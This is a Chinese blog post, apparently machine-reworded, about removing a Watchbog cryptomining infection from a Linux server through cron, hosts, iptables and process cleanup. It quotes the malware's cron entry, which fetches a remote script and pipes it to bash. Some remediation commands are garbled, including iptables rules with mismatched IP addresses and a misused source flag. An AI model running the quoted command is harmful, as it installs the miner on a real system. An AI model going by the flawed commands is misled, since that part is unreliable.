服务器挖矿是什么意思,服务器被攻击挖矿怎么解决!

最近运气不太好,居然有台服务器被挖矿了,下面记录下问题发生的过程和解决方法,仅供参考。 一、Watchbog挖矿病毒 1、服务器收到cpu报警,cpu被占用达到100%,登录服务器查看,发现cpu被一个watchbog的进程占满了,如下图所示: 2、杀掉会话 发现用kill杀掉后,这个进程还是会隔一会自动起来,很明显被加入了定时任务,检查所示: */9****(curl-fsSLhttps://r…

近期运势不大好,竟然有台服务器被挖矿了,下边统计下问题造成的流程和解决方案,仅作参考。


一、Watchbog挖矿病毒感染

1、服务器接到cpu警报,cpu被占有做到100%,登陆服务器查询,发现cpu被一个watchbog的过程布满了,如下图所示:

服务器被挖矿了?用这个思路可以彻底解决

2、杀死对话

发现用kill杀死后,这一过程依然会隔一会全自动下去,很显著被添加了定时任务,查验所显示:

*/9 * * * * (curl -fsSL https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||wget -q -O- https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||python -c \'import urllib2 as fbi;print fbi.urlopen(\"ht
tps://github.com/luckysBoys/lucks/blob/master/5.sh\").read()\'||curl -fsSL https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||wget -q -O - https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||curl -fsSLk https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh -m 90||wget -q -O - https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh --no-check-certificate -t 2 -T 60)|bash
服务器被挖矿了?用这个思路可以彻底解决

开启这一URL,发现好像一堆base64的保密,密文详细地址。

3、当消除掉定时任务的信息以后,隔了一会,其又被添加了以上一模一样的具体内容,因此该木马程序并不是一般的木马程序。

4、通过之后的掌握,发现该过程watchbog为被嵌入的挖矿程序流程,该程序会在cron下边载入脚本制作,按时去pastebin.com免费下载木马病毒逐渐挖矿,假如删掉不完全依然会经常性运行这一挖矿程序流程。


二、处理全过程

1、 改动/etc/hosts

仔细观察定时任务具体内容,可以发现好多个故意网站地址,各自如下所示:

1)raw.githubusercontent.com
2)github.com

先将以上这种详细地址跳转到当地

服务器被挖矿了?用这个思路可以彻底解决

2、服务器防火墙操纵进出总流量

将以上被网络攻击带上的网站域名所相匹配的的ip详细地址开展ip限制。

--例如raw.githubusercontent.com相匹配的ip为10.20.208.21
iptables -A INPUT -s 10.20.209.21 -j DROP
iptables -A OUTPUT -s 10.20.209.21 -j DROP
iptables -A OUTPUT -j DROP -d 10.20.209.2
--保存修改具体内容
/sbin/service iptables save

3、清除curl get脚本制作

由于该挖矿程序流程会依靠curl、wget命令去免费下载病毒感染,因此第一时间大家要开展如下所示实际操作:

mv /usr/bin/curl /usr/bin/lruc
mv /usr/bin/wget /usr/bin/tegw

假如确定病毒感染完全被删掉,我们可以不用实际操作。

4、 删除cron里边的有关每日任务

crontab -l 
/etc/cron.d
/etc/cron.deny
/etc/cron.monthly
/etc/cron.daily
/etc/cron.hourly
/etc/crontab
/etc/cron.weekly

以上8个与cron有关的文件名称我们都必须认真仔细一遍,但凡相关不知名的网站域名等数据都需要彻底删除。

1) crontab -l

服务器被挖矿了?用这个思路可以彻底解决

2)/etc/cron.d

该文件目录下新增加了好多个命令:appache、root、system

服务器被挖矿了?用这个思路可以彻底解决

3)/etc/cron.deny

服务器被挖矿了?用这个思路可以彻底解决

并没有发现

4)/etc/cron.monthly

服务器被挖矿了?用这个思路可以彻底解决

5)/etc/cron.daily

服务器被挖矿了?用这个思路可以彻底解决

6)/etc/cron.hourly

服务器被挖矿了?用这个思路可以彻底解决

7)/etc/crontab

在crontab文件中还发现了新的隐匿命令httpntp、ftpdns

服务器被挖矿了?用这个思路可以彻底解决

8)/etc/cron.weekly

服务器被挖矿了?用这个思路可以彻底解决

并没有发现

最终在使用find过虑一遍,保证彻底清理整洁。

5、 删掉故意命令

与此同时大家还发现了故意命令/bin/httpntp、/bin/ftpsdns、/usr/bin/watchbog

服务器被挖矿了?用这个思路可以彻底解决
服务器被挖矿了?用这个思路可以彻底解决

往往见到这种故意命令,是以定时任务日志(/var/log/cron)中发现的。

网络服务器被挖矿了?用这一思路可以彻底消除

6、 删掉tmp文件目录下timesyncc.service文档

文件详细信息如下所示:

服务器被挖矿了?用这个思路可以彻底解决

7、杀掉watchbog进程

ps -ef|grep watchbog|awk \'{print $2}\'|xargs kill -9

汇总

应对挖矿进程我简易汇总了以下几个方面,假如碰到挖矿进程解决顺序如下所示:

1)查询定时任务,寻找挖矿程序流程在实行的具体内容。

2)将恶意网站地址的hosts所有跳转到当地(127.0.0.1)

3)细心查询审批与定时任务相关的资料和文件目录,开展消除

4)删掉恶意的指令与包,重新命名系统软件中被充分利用的指令

5)杀掉相匹配恶意进程(为什么放进最终呢?由于即使最开始杀掉,其依然会由于定时任务这些自动启动)

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

(0)
上一篇 2022年6月2日 上午9:56
下一篇 2022年6月2日 上午9:57

相关推荐

  • 微商招商软文怎么写,吸引人的招商话语大全

    近两天来,有小伙伴问我招商文案该如何来写这样一个问题。招商文案,其实也可以理解为介绍企业招商方案的一个说明书。这份说明书不接介绍企业的招商理念,通过一层面来讲,招商文案是企业的招商方案。 那如何来写出一篇成功的招商文案,我自己认为从这么几个方面来入手 一、市场环境 小伙伴们都十分清楚,当下移动社交电商已然是大势所趋,手机网民的规模达7亿之多。人们的购物习惯和购物的模式也悄然发生了巨大的变化。而今,…

    2022年8月18日
    880
  • 网站快速排名怎么做,教你5个最快速上排名的技巧

    1、标题、描述设置 如果是中小型站点,首页和栏目页标题和描述最好手动设置,内页标题采用文章名称+品牌词的形式,并且标题包含关键词不能太多,2-3个为最佳。页面比较多的网站用统一的模板设置标题和描述,描述中最好包含关键词。标题的关键词之间是互相促进的关系(例如:SEO是什么和SEO的意思),也就是说搜索一个关键词可能会对另一个关键词的内容也感兴趣。 2、具有价值的内容 页面最重要的就是内容,可以不是…

    2022年9月17日
    6270
  • 什么cms建站好用,十大免费cms建站系统介绍

    现在80%的企业网站都会采用cms建站系统来搭建,国内很多用于企业建站的cms,小熊优化的小编介绍几款有代表性的cms给大家。 cms 一:PageAdmin PageAdmin后台 PageAdmin是一种使用asp.net mvc开的综合性内容管理系统,用户可以在支持asp.net服务器上架设属于自己的网站,PageAdmin有极高的扩展性,灵活度堪称业内标杆,目前被很多网站建设公司广泛采用,…

    2022年7月1日
    530
  • 微信吸粉方法大全,微信公众号吸粉最快的方法

    现在微信吸粉主流方法要么通过有吸引力的资源诱惑,要么用强有力的内容吸引,要么利用好奇心驱使,引导潜在粉丝去关注。 今天木木不花大篇幅讲吸粉具体操作技巧,只用一个小实例谈谈一个微信营销涨粉的思维,自行领悟,重在结合利用。 2天前无事,得到了一个斯嘉丽约翰逊最新大作《超体》的高清地址,有高清就看吧,省得跑去电影院了,看完后感觉还不错,想到还有众多屌丝苦苦在寻找高清地址,于是花了几分钟找了一个不错的该电…

    2022年10月8日
    490
  • 一个新产品策划方案怎么找投资商,掌握这五点投资商主动找上门

    丁丁记得以前在微博上看到这样的一句话:一个产品经理最重要的两把斧头就是逻辑思维和直觉。自己出来工作后也接触了很多产品方面的知识,之前丁丁也发过产品经理需要哪些能力的文章,诸如沟通能力、设计基本知识、开发基本知识都在此列。但回过头想想,往大的方向看,最重要的还是逻辑思维和直觉。 在设计行业越来越规范的今天,能否在业务上快速给出解决方案显得更加重要,这也是考验产品经理的直觉与逻辑思维,这两项能力决定了…

    2022年9月17日
    570
  • 20万左右买什么车好,这五款不仅省油档次还高

    随着豪华品牌价格的不断下探,对于很多年轻人来说,拥有一辆豪华座驾成为了可能,不再是梦。毕竟豪华品牌相比普通合资车型更有面子,尤其是春节回家拜见各路亲戚长辈,出去聚会遇到朋友同学都能更好地展现出自己成功的一面。今天,阿贵看车就给大家推荐5款,高性价比的豪华轿车,不仅造型精致、性价比高,主要20左右就能买到,赶紧来看看有没有你的菜…… 精致之选—–奥迪A3 奥迪A3是最早进入紧凑型豪华车的细分市…

    2022年10月4日
    420
  • 学生如何在电脑上免费赚钱,适合学生赚钱的软件分享

    前些年挂机网赚一直是网赚新手们的最爱,虽然这些年随着各种暴利资金盘的泛滥,挂机赚钱项目的市场已经越来越少了,但还是有那么一小撮人喜欢利用闲置电脑挂机赚钱。当然,我们这里说的不是“全自动挂机赚钱”之类需要你交钱的骗子项目,而是类似于柠檬挂机这样的流量类低收益挂机项目。 有人可能会有很大的疑问,这类低收益的挂机项目挂一天撑死了也才一块钱,尼玛,连电费都不够啊!这不是杀鸡取卵吗?说这话的人,可能对“闲置…

    2022年8月10日
    800
  • 闪迪内存卡怎么样(闪迪存储卡性能评测)

    作为一个专业的摄影师,你肯定对许多摄影设备见解颇深。但有一样东西你确定你选对了吗?前不久我一个摄影师朋友就发生过一次资料丢失的问题,整个人直接崩溃了,这样的问题之前他也遇到过不少,误删资料和损坏等等。 作为一个专业的摄影师,你肯定对许多摄影设备见解颇深。但有一样东西你确定你选对了吗?前不久我一个摄影师朋友就发生过一次资料丢失的问题,整个人直接崩溃了,这样的问题之前他也遇到过不少,误删资料和损坏等等…

    2022年10月23日
    640
  • 设计师绩效考核方案怎么做(最新设计总监绩效考核表)

    之所以设计师的绩效考核成绩难评估,是因为把不适合设计师的绩效目标丢给设计师去扛,又用不适合设计师的绩效成绩评估方式和标准,去评估一个本就不明确的目标。 往期回顾: 又到一年考核季,设计师该如何正确面对绩效考核? 设计师的工作难以量化,很难用单一的数据指标去直接验证设计效果,所以很多人认为设计师根本不需要通过绩效来考核,我将会用两篇文章的篇幅来具体讲讲,作为设计师的我是怎样理解绩… 阅读文章&g…

    2022年10月15日
    300
  • 发烧级耳机品牌排行榜,性价比最高的发烧级耳机有哪些

    提到万元以上发烧级耳机,相信大家都会想到索尼等大厂。正如大多数耳机发烧友所说,万元以上的耳机,才称得上是发烧级,还没入耳机这个坑的以前的我,对这句话根本不屑一顾。但是当我真正接触到万元以上的各大旗舰款耳机,才让我的想法发生了巨大的转变。果然,万元以下的耳机就只能听听声而已。 前不久我就刚刚入手了这款索尼旗舰——IER-Z1R,作为旗舰款一款HiFi耳机,首先从外观上来说就配得上旗舰二字。通常运用于…

    2022年8月3日
    700

发表回复

登录后才能评论

联系我们

400-800-8888

在线咨询: QQ交谈

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息

关注微信